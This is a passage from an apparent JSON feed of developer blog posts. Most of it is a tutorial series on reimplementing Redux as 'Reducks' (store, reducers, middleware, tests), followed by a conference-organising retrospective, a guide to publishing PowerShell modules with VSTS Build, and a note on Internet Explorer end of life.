asynchronous action payload, say an AJAX call. Well the real payload isn't known when you create the action, it'll come later once the AJAX call is completed. So you might want to suspend the call to the reducers until after the call completes, thus creating the payload from the response. Now you could buffer the call to store.dispatch until after the AJAX call completes, but then your application is a hybrid of redux and non-redux logic.\nBut for this post we're not going to use an AJAX call, instead we're going to use validation. I want certain types of validation against the payload of certain actions, for example - you need a non-empty value for the payload of ADD_TODO.\nAnatomy of a middleware function In redux a middleware function is actually made up of a series of chained, or curried, functions, with a signature like:\n1 let middlewareFunction = store => next => action => next(action); So we get:\nA store, well actually an API that is a subset of the store The next "step in the chain" The action being invoked Well, if we want to make a validation middleware it'd be like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import { ADD_TODO, ADD_ABORTED } from "../actions/types"; export const notEmptyValidator = store => next => action => { if ( action.type === ADD_TODO && (!action.payload || !action.payload.trim()) ) { return store.dispatch({ type: ADD_ABORTED, payload: "The name of the todo cannot be empty or a blank string" }); } return next(action); }; As you can see here we're checking some information about the incoming action. 
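To see how that plays out, here's a minimal usage sketch. It assumes the applyMiddleware enhancer we're about to build, an addTodo action creator and the import paths shown, so treat the names as illustrative rather than the exact demo-app code:

import { createStore, applyMiddleware } from "../src";
import { notEmptyValidator } from "./middleware";
import { addTodo } from "./actions";
import reducer from "./reducers";

// The enhancer can be passed in place of the initial state,
// which puts the validator in front of every dispatch
const store = createStore(reducer, applyMiddleware(notEmptyValidator));

// A real todo passes validation and reaches the reducer
store.dispatch(addTodo("Write a blog post"));

// A blank payload never reaches the reducer; the middleware
// dispatches ADD_ABORTED with an error message instead
store.dispatch(addTodo("   "));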
If our validation fails we instigate a new dispatch call to the store; if it passes we just hand the action on to the next step.\nImplementing middleware support Within redux middleware is tied together through an applyMiddleware function, the result of which becomes the third argument of our createStore call.\nWe'll start by updating our createStore method:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 export default function createStore (reducer, initialState, enhancer) { if (typeof initialState === 'function' && typeof enhancer === 'undefined') { enhancer = initialState; initialState = undefined; } let state; let currentSubscriptions = []; let nextSubscriptions = currentSubscriptions; if (typeof enhancer !== 'undefined') { return enhancer(createStore)(reducer, initialState); } ... }; So we've added a third argument to the function which, if provided (or if the initialState is skipped), is invoked and returned. You'll notice that the enhancer (which is our applyMiddleware or any other approach to extending our store) takes createStore as an argument and returns a new function that mimics the createStore behaviour, so we can immediately invoke it and return it.\nImplementing applyMiddleware Alright, let's get started on implementing our applyMiddleware feature:\n1 2 3 export default (...middlewares) => { return createStore => (reducer, initialState) => {}; }; The first thing we need to do is create our store. Lo and behold we've been provided everything that we could need to create the store too!\n1 2 3 4 5 6 export default (...middlewares) => { return (createStore) => (reducer, initialState) => { const store = createStore(reducer, initialState); ... }; }; Now this is where we really learn how the middleware works internally: we create a new dispatch method which is a chain calling through all the middlewares. We'll start by grabbing a reference to the dispatch method locally; with this local one we can change it without overriding the original reference on store.\n1 2 3 4 5 6 export default (...middlewares) => { return createStore => (reducer, initialState) => { const store = createStore(reducer, initialState); var dispatch = store.dispatch; }; }; Next we'll invoke the first method in our middleware function, and that receives the store instance provided to it, but we're only going to give it a subset of the store API, really all we want the middleware to have access to is getState and dispatch. We don't want middleware subscribing now do we? So how about we set up our middleware chain:\n1 2 3 4 5 6 7 8 9 10 11 12 13 export default (...middlewares) => { return createStore => (reducer, initialState) => { const store = createStore(reducer, initialState); var dispatch = store.dispatch; var middlewareAPI = { getState: store.getState, dispatch: action => dispatch(action) }; var chain = middlewares.map(m => m(middlewareAPI)); }; }; And the last step is that we need to return a store, because after all, this method is being used to create the full store instance! While we have the original store, we're not going to use that as our return value, because we're going to create a new dispatch method, as I mentioned earlier. This dispatch method is actually a wrapper around the original dispatch, but is a recursive call through each middleware. To do this I'm going to pull the logic out into a new function, in a new file, called compose. This compose function will take an array of functions and return a new function that we invoke with the final method for the chain to execute, and that will return a new entry point function. 
Let's start with its usage:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import compose from "./compose"; export default (...middlewares) => { return createStore => (reducer, initialState) => { const store = createStore(reducer, initialState); var dispatch = store.dispatch; var middlewareAPI = { getState: store.getState, dispatch: action => dispatch(action) }; var chain = middlewares.map(m => m(middlewareAPI)); dispatch = compose(...chain)(store.dispatch); return { ...store, dispatch }; }; }; You can see we use compose to create a new dispatch call and then combine that with the spread operator to create a new store, but with our reworked dispatch call.\nSo how does compose look?\n1 2 3 4 5 6 7 8 9 10 11 export default (...funcs) => { if (!funcs.length) { return arg => arg; } const last = funcs[funcs.length - 1]; const rest = funcs.slice(0, -1); return (...args) => rest.reduceRight((composed, func) => func(composed), last(...args)); }; It's not particularly complex. You'll see that there's a noop handler there (if you call it without any functions), but assuming there are some functions we grab the last one, invoke it with the provided arguments (our next, which in our usage so far is store.dispatch), then walk backwards through the remaining functions, each one wrapping the result of the one before it.\nConclusion There you have it, we've added middleware to reducks! We've seen that middleware is really just overriding the way dispatch works so that it keeps calling itself in a chain, passing through actions as needed.\nAs usual you'll find the code here.\n", "id": "2016-07-17-learning-redux-with-reducks-middleware" }, { "title": "Learning redux with reducks - multiple reducers", "url": "https://www.aaron-powell.com/posts/2016-06-27-learning-redux-with-reducks-multiple-reducers/", "date": "Mon, 27 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "Working with multiple reducers", "content": "Last time we added some tests to our codebase to illustrate how our implementation of Reducks works against Redux. This time I want to look at expanding the features of Reducks, and today that's support for multiple reducers.\nUnderstanding multiple reducers In a suitably complex Redux application you're going to want to break down your reducer into smaller reducers. Let's take our reducer code (abridged):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 export default function (state, action) { switch (action.type) { case TOGGLE_VISIBILITY_FILTER: ... case ADD_TODO: ... case COMPLETE_TODO: ... ... } }; Now you can see where this is going, we're going to have a very large switch statement, resulting in ugly code. So you might want to split this down into smaller functions, but another reason you might want to use multiple reducers is that you want to split your state apart. This might be done because, taking our example above, the visibility filter is independent from the list of todos, so we could have a reducer that only concerns itself with the visibilityFilter. Now we would have reducers looking like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 function visibilityFilterReducer (state = false, action) { if (action.type === TOGGLE_VISIBILITY_FILTER) { return !state; } return state; } function todosReducer (state = [], action) { switch (action.type) { ... 
} } Awesome, we've got a couple of smaller reducers, but how do we use them given that createStore takes a single reducer?\ncombineReducers This is a function provided by Redux that takes an object that has all our reducers as properties, like so:\n1 2 3 4 export default combineReducers({ visibilityFilter: visibilityFilterReducer, todos: todosReducer }); What the combineReducers function returns is a new function that takes two arguments, state and action, which looks very much like a reducer, doesn't it!\nNow here's the tricky thing, the object you pass into combineReducers is the shape of the state that you'll have for your application, but each reducer only has access to its own branch of that state, meaning that the visibilityFilter property is all that is accessible to the visibilityFilterReducer.\nImplementing the function So let's get started on our implementation:\n1 export default function combineReducers(reducers) {} We're going to need all those reducer functions so let's deconstruct our object and get them:\n1 2 3 4 5 export default function combineReducers(reducers) { var keys = Object.keys(reducers); return function(state = {}, action) {}; } So we've got our reducer names, we're returning our new reducer function, let's implement it:\n1 2 3 4 5 6 7 8 9 10 11 12 13 export default function combineReducers(reducers) { var keys = Object.keys(reducers); return function(state = {}, action) { return keys.reduce((newState, key) => { var reducer = reducers[key]; var currentState = state[key]; newState[key] = reducer(currentState, action); return newState; }, {}); }; } Ok, how does it work? Well we take our reducer names (keys) and use the reduce function with an initial state of an empty object. For each reducer we:\nGet the current state (which will be the initial state provided to the store, or undefined if we use the default argument set on the new reducer function) Invoke the reducer with the current state and the action Return the new state Because we're using the reduce array method we then combine all the new states into a new object, using each reducer's name as the property name. So after our first run (the @@INIT action) our state would look like:\n1 2 3 4 { visibilityFilter: false, todos: [] } Pretty nifty! Since we use the reduce method we create a new state object every single time, meaning that we don't have to worry about mutating the previous state object (sure a reducer could do that, but we don't :P).\nAnd then we're done.\nConclusion And that is how we implement multiple reducers in Reducks. Ultimately it's a bit of a misnomer, we still only have a single reducer as far as the store knows, but internally we're breaking apart state, using different functions to handle different parts of the state tree and creating a single application state.\nNow the combineReducers function doesn't have to be done this way, I'm just looking at how Redux does it, but if you didn't want each reducer to handle its own branch, and instead have access to the whole tree, you could use an array of reducers and loop over them, providing the full state to each one.\nI've gone ahead and updated the code, you can find it at this tag, I've also taken it one step further than we looked at above and split the incomplete and complete todos apart (there's a rough sketch of that below). 
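The reducer, action and property names here (and the import paths) are illustrative rather than the exact ones in the tagged code, but the split looks roughly like this:

import combineReducers from "../src/combineReducers";
import { ADD_TODO, COMPLETE_TODO, TOGGLE_VISIBILITY_FILTER } from "./actions/types";

// Todos that haven't been completed yet
function incompleteTodosReducer(state = [], action) {
  switch (action.type) {
    case ADD_TODO:
      return [...state, action.payload];
    case COMPLETE_TODO:
      return state.filter(todo => todo !== action.payload);
    default:
      return state;
  }
}

// Todos that have been completed
function completeTodosReducer(state = [], action) {
  return action.type === COMPLETE_TODO ? [...state, action.payload] : state;
}

function visibilityFilterReducer(state = false, action) {
  return action.type === TOGGLE_VISIBILITY_FILTER ? !state : state;
}

// Each reducer owns one branch of the application state
export default combineReducers({
  visibilityFilter: visibilityFilterReducer,
  incompleteTodos: incompleteTodosReducer,
  completeTodos: completeTodosReducer
});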
I’ve also updated the tests to understand the new structure.\n", "id": "2016-06-27-learning-redux-with-reducks-multiple-reducers" }, { "title": "Learning redux with reducks - creating a Store", "url": "https://www.aaron-powell.com/posts/2016-06-09-learning-redux-with-reducks-creating-a-store/", "date": "Thu, 09 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "An introduction to the Store and how to make a simple one.", "content": "Last time we learnt the basics of what Redux is and what it does, now it’s time to start looking at how it works.\nBefore we get started, I’ve created a little app that we’ll be using. Because I wanted to illustrate that Redux isn’t just for React our sample application is not going to be a React application, it’s actually going to be a little console application. You’ll find the starting point for the code here.\nIt’s (obviously) a todo application, our quintessential demo app, which has a Redux Store, some Actions and Reducers. I’ve also created a couple of unit tests that indicate how it works. The goal of the rest of this series will be to swap out the import { ... } from 'redux' for the same calls into a library we’ll create called Reducks.\nOur first step is to create the store, and this is done by a function exposed by Redux, createStore.\nImplemented createStore This function is the core of Redux, it takes three arguments:\nA reducer Initial State Enhancers We’re going to ignore Enhancers for the moment, we’ll look at that later in the series, so we’ll focus on supporting the first two arguments.\nThe return value of calling createStore is a Store instance, which has four methods on it:\ngetState dispatch subscribe replaceReducer Again, to keep this article short we’ll not cover the replaceReducer method, we’ll look at that later in the series.\nSo, our basic code will look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 const createStore = function(reducer, initialState) { const getState = function() {}; const dispatch = function(action) {}; const subscribe = function(fn) {}; return { getState, dispatch, subscribe }; }; export default createStore; Pretty simplistic huh! Now let’s start making those functions do something.\ngetState The getState function is our window into what’s happening within Redux, our ability to get the data within our application. The state in Redux is really just a plain old JavaScript object, you can define it any which way you like, you can use a library like Immutable.js if you want, it’s just an object.\nFor our Store I’m going to want to track a state within it:\n1 2 3 4 const createStore = function (reducer, initialState) { let state = initialState; ... Now we have a local state variable which we initialise from the consumer, and I bet you can guess how getState looks when implemented!\n1 2 3 4 5 ... const getState = function () { return state; }; ... Fantastic, we can now get the state of our Redux store!\ndispatch The dispatch function is what we use when we need to fire off an Action in Redux, which is why it takes an action argument to it. You’d use it off a store like so:\n1 store.dispatch({ type: "ADD_TODO", payload: "Todo name" }); Internally what it does is invokes the reducer which we provided the Store in createStore, along with the initial state of the Store, and then the result of that becomes the new state. 
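To make that a little more concrete before we write the implementation, here's a tiny sketch of the step dispatch performs internally; the reducer is hypothetical and purely for illustration:

// A hypothetical reducer, just to show the shape of the call
const reducer = (state = { todos: [] }, action) =>
  action.type === "ADD_TODO"
    ? { ...state, todos: [...state.todos, action.payload] }
    : state;

// The store starts out holding whatever initial state it was given...
let state = { todos: [] };

// ...and each dispatch effectively boils down to this one line:
state = reducer(state, { type: "ADD_TODO", payload: "Todo name" });
// state is now { todos: ["Todo name"] } and becomes the store's new state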
With an Action there needs to be a type property, so you’d probably want to do some validation there as well, making a dispatch implementation look like so:\n1 2 3 4 5 6 7 8 9 10 ... const dispatch = function (action) { if (typeof action.type === 'undefined') { throw Error('A `type` is required for an action'); } state = reducer(state, action); return action; }; ... One thing you’ll notice about the implementation is that we return the action that was passed in. This is so that the place that dispatched the action could do something once it’s completed. But running directly after the dispatch completes might be a problem, especially when you start working with asynchronous payloads, so for that we’d want to subscribe to the Store.\nsubscribe The final piece of the puzzle when working with your Store is knowing when the Reducer has finished, and to do that in a way that is independent of where the dispatch was called from. We do this via the subscribe method that a Store exposes.\nThis method takes a function as the argument, the subscriber isn’t passed any arguments, it’s up to the listener to work out how to get to the state, generally using the getState method. It returns a new function which you can use to unsubscribe, so you don’t have hold a reference to the listener function.\nThe implementation looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... let subscriptions = []; const subscribe = function (fn) { if (typeof fn !== 'function') { throw Error('The provided listener must be a function'); } var subscribed = true; subscriptions.push(fn); return function () { if (!subscribed) { return; } var index = subscriptions.indexOf(fn); subscriptions.splice(index, 1); subscribed = false; }; }; ... Well now that we have the ability to subscribe we probably want to actually invoke the listeners when dispatching:\n1 2 3 4 5 6 7 8 9 10 11 12 const dispatch = function (action) { if (typeof action.type === 'undefined') { throw Error('A `type` is required for an action'); } state = reducer(state, action); subscriptions.forEach(fn => fn()); return action; }; ... To easy!\nNow one thing you might want to add to the subscribe function is mutation hold on the subscribers collection. The reason for this that you want the collection of listeners shouldn’t change while a dispatch is running. So let’s update our methods to handle this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 ... let currentSubscriptions = []; let nextSubscriptions = currentSubscriptions; const ensureCanMutateNextListeners = function () { if (nextSubscriptions === currentSubscriptions) { nextSubscriptions = currentSubscriptions.slice(); } }; const subscribe = function (fn) { if (typeof fn !== 'function') { throw Error('The provided listener must be a function'); } var subscribed = true; ensureCanMutateNextListeners(); nextSubscriptions.push(fn); return function () { if (!subscribed) { return; } ensureCanMutateNextListeners(); var index = nextSubscriptions.indexOf(fn); nextSubscriptions.splice(index, 1); subscribed = false; }; }; const dispatch = function (action) { if (typeof action.type === 'undefined') { throw Error('A `type` is required for an action'); } state = reducer(state, action); var subscriptions = currentSubscriptions = nextSubscriptions; subscriptions.forEach(fn => fn()); return action; }; ... 
So here we have a function ensureCanMutateNextListeners that, when invoked, checks if the two arrays are the same array reference and, if they are, uses slice to clone currentSubscriptions so that when we modify the nextSubscriptions array (adding or removing a listener) it won't impact any currently running dispatch pipeline. The goal here is to ensure that the listeners used by dispatch are a point-in-time snapshot from when the dispatch started.\nInitialising your Store There's one last thing that the Store does when you call createStore and that is to trigger an initialisation action. In Redux this can be observed by the action redux/@@INIT being dispatched, but for our Reducks library we'll trigger reducks/@@INIT. We'll add this to the very last step before returning the Store object:\n1 2 3 4 5 6 7 8 9 10 11 ... const INIT_ACTION = 'reducks/@@INIT'; dispatch({ type: INIT_ACTION }); return { getState, dispatch, subscribe }; ... This will cause the Reducer to be run with the initial state (if provided). Now, your reducer probably isn't subscribing to reducks/@@INIT (or redux/@@INIT), so it'll be a noop, but still, it gives you the entry hook if you so desire it.\nConclusion The Redux store is the core part of the application; it's quite simplistic in how it is implemented, but really quite powerful. We've seen how the three core methods, getState, dispatch and subscribe, are implemented to make our Store operational.\nYou'll find the code in the Reducks GitHub repo on the reducks-baseline tag, in the src folder.\nNext time we'll plug Reducks into our sample application and tests to make sure that it works correctly!\n", "id": "2016-06-09-learning-redux-with-reducks-creating-a-store" }, { "title": "Learning redux with reducks - tests and demo app", "url": "https://www.aaron-powell.com/posts/2016-06-09-learning-redux-with-reducks-tests-and-demo/", "date": "Thu, 09 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "Converting our tests and demo across for use with Reducks", "content": "Last time we started creating our Reducks library by implementing createStore, and while I have all confidence in my ability to write bug-free code we do have some tests in the demo app, so let's use them.\nSo, where do we start?\nAbstracting createStore It's actually not that complex to do. Normally within the code base you would have:\n1 import { createStore } from "redux"; The next step is to change what we export so that, instead of just being the function to run, it's wrapped in a function that receives createStore. So with our index.redux.js file I have renamed that to index.js and added a new export:\n1 2 export default function (createStore) { ... Now we can create a new index.redux.js file that looks like so:\n1 2 3 4 import { createStore } from "redux"; import app from "./index"; app(createStore); And we can also create index.reducks.js:\n1 2 3 4 import { createStore } from "../src"; import app from "./index"; app(createStore); Then you can run it:\nPS> npm run reducks-demo Testing I'm using mocha as my test framework so normally you'd write a test like so:\n1 2 3 4 5 describe('set visibility filter', () => { it('should change visibility when SET_VISIBILITY_FILTER action fired', () => { ... 
}); }); Well, I'd be remiss not to ensure that the tests work with both libraries, so to do that I'm going to wrap the it scenario so that I can inject the createStore function (and I also pushed it into a separate file):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import { setVisibility } from "../examples/actions"; import { expect } from "chai"; import creator from "../examples/stores"; export default { "should change visibility when SET_VISIBILITY_FILTER action fired": createStore => done => { const store = creator(createStore); const initialState = store.getState(); store.subscribe(() => { const nextState = store.getState(); expect(nextState.visibilityFilter).not.to.equal( initialState.visibilityFilter ); done(); }); store.dispatch(setVisibility(!initialState.visibilityFilter)); } }; Now let's change how our test is set up:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 import * as redux from "redux"; import * as reducks from "../src"; describe("set visibility filter", () => { describe("redux", () => Object.keys(visibilityFilterTests).map(key => it(key, visibilityFilterTests[key](redux.createStore)) )); describe("reducks", () => Object.keys(visibilityFilterTests).map(key => it(key, visibilityFilterTests[key](reducks.createStore)) )); }); Using Object.keys I can go through the hash that's exported and create the it call, passing in the createStore. For readability I've also wrapped the test scenarios in a nested describe so that I can identify which library the tests were run against.\nConclusion This was a simple little post where we looked at how we refactored the existing code to support being able to use different implementations of Redux and support our test scenarios as we work on more features.\nI've updated the repository with a new tag that shows the progress.\n", "id": "2016-06-09-learning-redux-with-reducks-tests-and-demo" }, { "title": "Learning redux with reducks - intro", "url": "https://www.aaron-powell.com/posts/2016-06-06-learning-redux-with-reducks-intro/", "date": "Mon, 06 Jun 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "A start in the series about learning the inner workings of redux", "content": "Over the last 18 months I've been working with React and throughout that time I've used a number of different design patterns. For the past 6 months I've been primarily using Redux and I've found its beauty is in its utter simplicity.\nI'm the kind of person who likes to know how things work at the low levels though, because I feel if you know the low levels then you're going to be better informed about whether something is the right tool, or whether you're just holding a hammer and seeing nails.\nTo this end I've decided to write a blog series diving into Redux and looking at creating it from the ground up; to do this I'm going to create a little library called Reducks (get it!).\nNow, while it's common to come across Redux in the React community, Redux is more than just a React library, and that's the topic for this first blog post, a look at the basic architecture of Redux.\nIt's all about data flows When I'm introducing Redux to people the one critical point that I want them to take away is that Redux is about how data flows through an application. To achieve this there are three core components:\nAction Reducer Store It's also a cyclic notion, a Store will Dispatch an Action to get data, which is then passed to a Reducer which results in updated data for the Store.\nActions Actions are really simple objects, they are responsible for providing the instructions. 
Generally speaking an Action will have a type property on it that represents what is to be done. Now, if you're implementing Redux from scratch in your own application you don't need to use a type property, you can use whatever you want, but in doing so you're moving away from Redux 'as designed'.\nAs an Action is responsible for providing instructions you're often going to have data associated with it, this might be a Promise as you do an XHR, it might be some calculated data, or whatever. This is represented by whatever else you provide on the Action object. So an example Action might be like so:\n1 2 3 4 const action = { type: "ADD_TODO", value: "Write a blog post" }; While an Action is just a plain old JavaScript object you'll probably want a function to generate it:\n1 2 3 4 5 6 const addTodoAction = function(value) { return { type: "ADD_TODO", value }; }; This way you can use the Action again and again in your application.\nReducers Reducers do the grunt work of your data flow, they are responsible for taking the information from the action and the present state of your data, and producing a new data state. Basically a reducer looks like this:\n1 const reducer = (state, action) => state; That is a Reducer that acts as a noop. You can do whatever you want within the Reducer, the main rule is that you shouldn't change the original state (the first argument), instead create a new state object based on the original one. Commonly you'll do this using Object.assign or the spread operator { ...state }.\nSo we'll update our noop example:\n1 2 3 const reducer = (state, action) => ({ ...state }); // or const reducer = (state, action) => Object.assign({}, state, {}); Store The Store is really the heart of our data flow, it knows about our Reducers, it's told to dispatch Actions and owns the State. I won't go into the implementation of a Store, that's next up in the series, but to consume a Store it'd be something like this:\n1 2 3 const store = createStore(reducer); store.dispatch(addTodoAction("Write a blog post")); console.dir(store.getState()); The basic process is:\nCall dispatch with an Action Execute all reducers Update the State in the Store A Store has a handy method on it, getState, which exposes our state back to us.\nNow you're probably going to want a single Store within your application, or at least as few Stores as possible; the fewer Stores you have, the fewer independent State objects you have, and the easier it is to observe data changes within your application and ultimately simplify data binding.\nSide note: there are more methods exposed by a Store, this is just the most basic implementation. Also, I didn't want to spoil all our fun in the first post!\nConclusion We're starting our journey into understanding how Redux works under the hood. We've learnt about the three core concepts: Actions which tell us what to do/get us data, Reducers which take the current state and our Action to produce a new state, and then the Store which orchestrates it all.\nNext time we'll look into how to create our own Store.\n", "id": "2016-06-06-learning-redux-with-reducks-intro" }, { "title": "DDD Sydney 2016 - What I learnt organising the conferences", "url": "https://www.aaron-powell.com/posts/2016-06-01-dddsydney-what-i-learnt-organising-the-conference/", "date": "Wed, 01 Jun 2016 00:00:00 +0000", "tags": [ "dddsydney" ], "description": "A look back at what I learnt organising DDD Sydney 2016", "content": "On Saturday 28th May we saw the return of DDD Sydney after a 4 year absence. 
This was also the first year that I took a lead role in organising the event, previously I’d really only done ‘on the day’ volunteering. DDD Sydney was a team effort, but I want to talk about what I personally learnt running this event for the next person silly enough to try and organise a conference!\n2 months is not a lot of timeAround the end of March this year we made the decision to go ahead and organise DDD Sydney, but we had a couple of goals:\nDidn’t want to clash with the timing of DDD Melbourne Wanted to happen before NDC Sydney The NDC crew had already reached out to us and wanted to be our platinum sponsor, and with that we wanted to help them promote DDD Sydney. This meant we had a particular set of deadlines to hit, and with that in mind we settled on the 28th May as our event date.\nThis was approximately 2 months from when we’d had our first chat about it happening, well it happening in earnest, we’d done some preliminary work but not really got to the point of picking a date.\nWell, we managed to achieve it, but it was a real scramble to get everything done, here’s some highlights from it being a really short timeline:\nWe ordered the speaker/volunteer shirts the Sunday before the event, picking them up the Friday evening after many frantic calls to the printer 3 weeks out from the event we had no money in the account and suppliers needing to be paid (I’ll talk about finances in more detail below) 2 weeks out I found out that internet banking wasn’t setup and I couldn’t log into the bank account (so we couldn’t pay suppliers) At the event I said to the rest of the committed that I was looking forward to Sunday because that meant 6 months until we need to start planning the next one, yep we’ll aim for around 6 months lead time for 2017!\nSo who’s coming?Given there’d been 4 years since the last event we didn’t really know how “popular” the brand still was. One of the drivers behind doing the event again was that I’d had a few people ask me “when’s DDD Sydney coming back?”, generally around the time DDD Melbourne is on. Cool, so we know some people are interested but just how many are there? 10? 50? 100? 500?\nWe also didn’t know what to expect in terms of session submissions. The rest of the organisers did receive a bit of a panicked email from me a week or so out from the close of the CFP saying “So we have about 10 sessions submitted and 15 slots to fill, what do we do if we don’t get enough?!”. Knowning the teams behind DDD Melbourne, Brisbane and Perth, having talked to them about submissions I know I shouldn’t have been worried as you always get a rush at the end, but still it was nail-biting for a few days. In the end we didn’t have cause for concern, we had 52 submissions from 28 speakers!\nGiven our really short timeframe it also meant that I was concerned about whether we’d sell enough tickets. This is part of why we did the early bird sale, try and get people to buy earlier and (hopefully) we could sell out. But what constitutes selling out? How many people should we plan for? Well we based our target off the other events, but ultimately came up short (ie, we didn’t sell out), but when it was 2 weeks out with less than 100 tickets there was another panicky email from myself. 
But as to be expected there was a rush at the end, resulting in us having a good number of people attending.\nIt’s all about the moneyConferences aren’t free to run, but I don’t think anyone expected that.An event like DDD doesn’t work without the support of our sponsors, and that involves making sure that we receive money from those who are supporting us financially.\nMost companies that sponsor work on a 30 or 60 day invoice cycle, so when you issue an invoice for them to sponsor there’s a lag in that being paid, and here’s the kicker, you’re doing a 2 month turn around, most sponsors won’t settle an invoice for at least 30 days, and you’ve probably spent a few weeks getting it all sorted? Well you’re in a sticky situation financially aren’t you!\nSponsors aren’t the only way money comes in though, there’s also ticket sales. We used EventBrite which works really nicely, except for one kicker, they don’t forward the money until after the event (a week-ish after), so regardless of how cashflow positive you are from your ticket sales you still won’t see it until after the fact. I did speak to some other event organisers on the day who were surprised we’d used EventBrite, as they’d hit this problem in the past. It’s a hard one to solve, if you cut out the middleman and take the money directly you need to do something to support refunds/cancellations too.\nAnd then there’s your outgoing expenses, things like venue hire, catering, etc, need to be paid before the event, bit of a problem if you’re not getting ticket money until after and sponsors won’t complete the invoice in time!\nNext year I want to make sure that we plan our cashflow better so we’re not scrabbling at the last minute. It’ll help that we already have a number of sponsor contacts now, we can engage a lot earlier which will help there.\nVolunteersThis is something I really didn’t think about in the lead up to the event, how many volunteers would we need for it? Well we’ve got a few of us on the organising committee and we’ll rope a few in on the day. Right?\nWell, that’s not really the right way to approach the problem, in hindsight we should have planned more around the number of people we’d have to help out, this would’ve helped direct people to the venue location and we could’ve had a dedicated volunteer per room to direct people.\nConclusionWe pulled it off. It was a lot of hard work but more importantly it was very much a learning experience.\nRunning a business is hard work, and that’s ultimately what this is, a not for profit business but a business none the less. Cashflow, supplier management, vendor management, these are all the behind the scenes tasks we take on to make a day like DDD happen.\n", "id": "2016-06-01-dddsydney-what-i-learnt-organising-the-conference" }, { "title": "Deploying PowerShell modules with VSTS Build", "url": "https://www.aaron-powell.com/posts/2016-02-08-deploying-powershell-modules-with-vsts-build/", "date": "Mon, 08 Feb 2016 00:00:00 +0000", "tags": [ "powershell", "cd", "vsts" ], "description": "Automating the publishing of PowerShell modules to the gallery with VSTS Build", "content": "A few years ago I created a PowerShell module to allow me to install and use multiple versions of Node.js on my Windows machine. 
I realised that this could be useful for other people so I put it up on GitHub, called ps-nvmw, short for PowerShell Node Version Manager for Windows.\nBut when I first wrote it there was no really good way to share modules with other people, my instructions were always something like “Clone the repo and import the module”.\nWith Windows 10, or more accurately Windows Management Framework 5 (which is part of Windows 10 and a separate install for other OS’s) PowerShell module sharing is even easier, thanks to PowerShell Gallery (there are other offerings but this seems to be the best approach to me). Basically this works like NuGet or Chocolatey, allows you to find, install and update modules, and is quite easy to distribute them too.\nSo I decided to get ps-nvmw up there and I decided to do it in a continuous delivery approach using Visual Studio Team Services Build and let’s walk through how to do that.\nStep 1 - Create a VSTS BuildNote - I’m using GitHub as my repository and you can to, follow this guide to set that up.\nWe’re going to create a new build in VSTS, under whatever project you want, I have one called github-projects that builds all my various GitHub projects (shocking!). Because this is pretty custom we’re going to use the Empty build definition template.\nStep 2 - Setting up the publish folderWhen your build agent checks out your repository it does so into a very short path, for example mine is C:\\a\\1\\s (my guess is to avoid problems with Windows Path’s exceeding the 260 character limit), and this is going to be a problem in Step 4 as we’ll use the Publish-Module commandlet with the -Path. The problem we’ll hit is that this command expects the name of the module definition (your psd1 file) is the same as the folder. Sadly s is not the name of my module, it’s nvm, so we will need to create a new folder.\nSo add a new Build Step of type Command Line (under Utility) with the tool being mkdir and the arguments being the name of your module:\nStep 3 - Preparing your moduleWith our module folder created we next want to put the files in that we want to publish, ideally your psm1 and psd1 files.\nTime to add another Command Line Build Step, this time it’ll be a tool of xcopy and arguments to select your files:\nStep 4 - Publishing your moduleThis step I’m doing a little dodgy, mostly because I’m lazy, but now it’s time that we publish our module to the gallery. To do that we’ll need to use the Publish-Module commandlet in PowerShell, providing the path to your module and the API key for the gallery. For the sake of good practice (I can do good practice inside dodgy work!) I’ve created a private variable in the build for the API key (keeps it out of my logs then).\nFor this step I’m again using Command Line but the tool is powershell and the arguments are Publish-Module -Path $(System.DefaultWorkingDirectory)\\nvm -NuGetApiKey $(PSGalleryApiKey). There are two variables in the arguments, the first is the folder the repository was cloned to (which is available in all build steps) and the second is my API key, which I gave the name PSGalleryApiKey. The step looks like so:\nYou can probably see how it’s a little dodgy, that I’m using a Command Line step to invoke a PowerShell session to run a PowerShell command. 
If you were doing it better you would have a PowerShell file in your repository that wrapped that command, since you can't run "arbitrary" PowerShell from a step (without a dodgy thing like I have).\nConclusion There we have it folks, 4 steps on how to use VSTS Build to deploy a PowerShell module to the PowerShell Gallery. It might be a little dodgy but I have that working with CI builds, so all pushes to master on GitHub result in a release to the gallery.\nSome final thoughts:\nI really should write a script that goes into the repository to replace the dodginess of Step 4 I'm not using Pester for testing like a lot of people, but getting that hooked in would be cool The workflow is not quite right as I'm deploying from VSTS Build, that should really happen from VSTS Release Management. To do that you'd remove the last step I have, replace it with a 'copy to artifacts' step, and have RM run the Publish-Module step. It might need to redo the path setup steps too Happy Scripting!\n", "id": "2016-02-08-deploying-powershell-modules-with-vsts-build" }, { "title": "Are you ready for January 12?", "url": "https://www.aaron-powell.com/posts/2016-01-03-are-you-ready-for-january-12/", "date": "Sun, 03 Jan 2016 00:00:00 +0000", "tags": [ "internet-explorer" ], "description": "Are you ready for the end of old Internet Explorer?", "content": "On January 12 all versions of Internet Explorer prior to version 11 will reach end of life.\nAssuming you're running Windows 8.1 or 10 this won't be a problem as IE11 was the only version you could install. If you're running Windows 7 you are probably already running IE11 as it was a mandatory update shipped via Windows Update, so unless you disabled automatic updates you're also safe.\nIf you're running any other Windows version then you're already running software that has reached end of life and you should probably upgrade anyway.\nWhat version of IE am I running? If you're unsure what version of IE you have on your machine it's pretty easy to check:\nOpen Internet Explorer Go to Help (you may need to press ALT if you can't see the menu) Choose About Internet Explorer Why does it matter? Security, it all comes down to security. Browsers are a very common attack vector for hackers so browser makers are constantly working to ensure they protect against newly discovered issues. So with IE < 11 no longer being supported you run the risk of having another potential entry 